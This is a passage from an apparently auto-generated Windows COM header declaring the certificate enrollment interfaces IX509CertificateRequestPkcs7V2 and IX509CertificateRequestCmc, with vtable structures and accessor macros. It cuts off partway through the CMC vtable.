            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *CheckCertificateSignature )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs7V2Vtbl;

    interface IX509CertificateRequestPkcs7V2
    {
        CONST_VTBL struct IX509CertificateRequestPkcs7V2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs7V2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs7V2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs7V2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs7V2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs7V2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs7V2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs7V2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs7V2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs7V2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs7V2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs7V2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs7V2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs7V2_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs7V2_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestPkcs7V2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs7V2_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestPkcs7V2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs7V2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs7V2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509CertificateRequestPkcs7V2_CheckCertificateSignature(This,ValidateCertificateChain)	\
    ( (This)->lpVtbl -> CheckCertificateSignature(This,ValidateCertificateChain) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCmc_INTERFACE_DEFINED__
#define __IX509CertificateRequestCmc_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCmc */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCmc;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab345-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCmc : public IX509CertificateRequestPkcs7
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromInnerRequestTemplateName( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CryptAttributes( 
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TransactionId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_TransactionId( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SenderNonce( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SenderNonce( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ArchivePrivateKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ArchivePrivateKey( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyArchivalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyArchivalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionStrength( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyHash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificates( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCmcVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCmc * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplateName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc * This,
